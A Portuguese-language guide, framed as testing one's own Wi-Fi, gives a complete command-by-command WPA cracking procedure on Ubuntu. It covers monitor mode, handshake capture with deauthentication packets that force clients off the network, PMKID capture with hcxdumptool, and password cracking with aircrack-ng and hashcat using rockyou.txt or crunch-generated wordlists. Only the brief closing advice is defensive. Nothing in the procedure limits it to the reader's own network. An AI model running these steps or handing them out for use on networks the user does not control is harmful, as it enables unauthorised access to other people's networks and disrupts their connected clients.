Pular para conteúdo

Wifi Attack

Guia Prático: Testando a Segurança do Seu Wi-Fi no Ubuntu

1. Instalar Ferramentas Necessárias

sudo apt update
sudo apt install aircrack-ng crunch

2. Identificar e Ativar Modo Monitor

Veja suas interfaces Wi-Fi:
sudo airmon-ng
Ative o modo monitor (troque wlan0 pelo nome da sua interface):
sudo airmon-ng start wlan0
Confirme se entrou em modo monitor:
iwconfig

Você deve ver Mode: Monitor para a interface.


3. Escanear Redes Wi-Fi

troque wlan0 pelo nome da sua interface e adicione mon no final:
sudo airodump-ng wlan0mon
  • Anote:
    • BSSID → MAC do seu roteador
    • CH → Canal usado
    • ESSID → Nome da rede

Pressione CTRL+C para parar.


4. Capturar Handshake

Troque [CANAL] e [BSSID] pelos dados da sua rede:
sudo airodump-ng -c [CANAL] --bssid [BSSID] -w captura lan0mon

Deixe rodando. Agora vamos gerar tráfego para forçar um cliente a se reconectar:

Em outro terminal:
sudo aireplay-ng --deauth 5 -a [BSSID] wlan0mon

Quando o airodump-ng mostrar WPA handshake no topo da tela, você pode parar com CTRL+C.

Isso vai gerar um arquivo captura-01.cap.

Capturar Handshake com PMKID + Hashcat

Caso não tenha a ferramenta instalada:
sudo apt install hashcat hcxdumptool hcxpcapngtool
# Use o hcxdumptool para pedir PMKID ao roteador:
sudo hcxdumptool -i wlan0mon -o captura.pcapng --enable_status=1
  • Deixe rodar por 30–60s para garantir que capture o PMKID.
  • Depois pressione CTRL+C para parar.
Transforme o arquivo .pcapng em hash compatível:
hcxpcapngtool -o hash.22000 captura.pcapng
Se der certo, você verá algo como:
Written 1 PMKID(s) to hash.22000

5. Quebrar a Senha

Use uma wordlist. O Kali vem com a famosa rockyou.txt, mas no Ubuntu você pode baixá-la:
sudo apt install wordlists
Depois rode:
aircrack-ng captura-01.cap -w /usr/share/wordlists/rockyou.txt

Se a senha estiver na lista, ele vai exibir algo assim: KEY FOUND! [ MinhaSenha123 ]

Quebrar senha com hashcat:
hashcat -m 22000 hash.22000 /usr/share/wordlists/rockyou.txt
Interpretar resultado
Se encontrar a senha, Hashcat vai mostrar no terminal algo como:
<hash> : minha_senha_encontrada

Se não encontrar, você pode tentar: - Criar wordlist personalizada com crunch. - Usar regras diferentes. - Testar ataques híbridos (hashcat ... ?d?d?d para números no final).


6. (Opcional) Criar Sua Própria Wordlist

Se quiser gerar combinações específicas, use crunch.

Exemplo: gerar senhas de 8 a 10 caracteres com letras e números:
crunch 8 10 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 -o minha-wordlist.txt
E depois usar no aircrack-ng:
aircrack-ng captura-01.cap -w minha-wordlist.txt

Após o Teste

Se você conseguiu quebrar sua senha rapidamente: - Troque para uma senha mais longa e complexa (12+ caracteres). - Desative WPS no roteador. - Use WPA2-AES ou WPA3.